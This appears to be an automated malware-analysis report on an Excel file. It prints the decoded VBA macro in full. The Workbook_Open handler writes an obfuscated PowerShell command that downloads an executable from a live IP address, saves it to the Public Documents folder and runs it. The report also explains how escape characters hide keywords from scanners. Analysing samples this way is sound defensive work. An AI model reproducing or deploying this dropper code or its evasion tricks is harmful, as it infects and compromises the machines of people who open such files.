MALICIOUS
128
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1105 Ingress Tool Transfer
T1566.001 Spearphishing Attachment
The Workbook_Open VBA macro is designed to stage a PowerShell command that downloads an executable from 'http://3.64.251.139/v11/1/TDH_71036210065IMG.exe' and saves it as 'C:\Users\Public\Documents\minutesister.exe'. The script then executes the downloaded file. The GetObject call is used to execute the staged PowerShell command from 'C:\Users\Public\Documents\frontserve.cmd'. This indicates a downloader or droppper functionality.
Heuristics 4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPERThe macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.Matched line in script
Private Sub Workbook_Open() -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
GetObject("new:" & sheehe & "l.application").Open (andattack) -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1282 bytes |
SHA-256: b3abc6692fe42688fbbf515efa69602b6d99534534a0c5a4be0688d6094565f2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
kidus = "pow^ers"
yourcost = "he^ll"
studenttrip = FreeFile
andattack = "C:\Users\Public\Documents\frontserve.cm" & Chr(CLng(97.5) + CLng(1.6))
Open andattack For Output As #studenttrip
Print #studenttrip, kidus & yourcost & " -w hi slee^p -Se 31;Start-BitsTrans^fer -Source htt`p://3.64.251.139/v11/1/TDH_71036210065IMG.e`xe" & " -Destination C:\Users\Public\Documents\minutesister.e`xe" & ";C:\Users\Public\Documents\minutesister.e`xe"
Close studenttrip
sheehe = "shel"
GetObject("new:" & sheehe & "l.application").Open (andattack)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub starbed()
'
' starbed Macro
' 1Y9EPHD78LD1
'
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.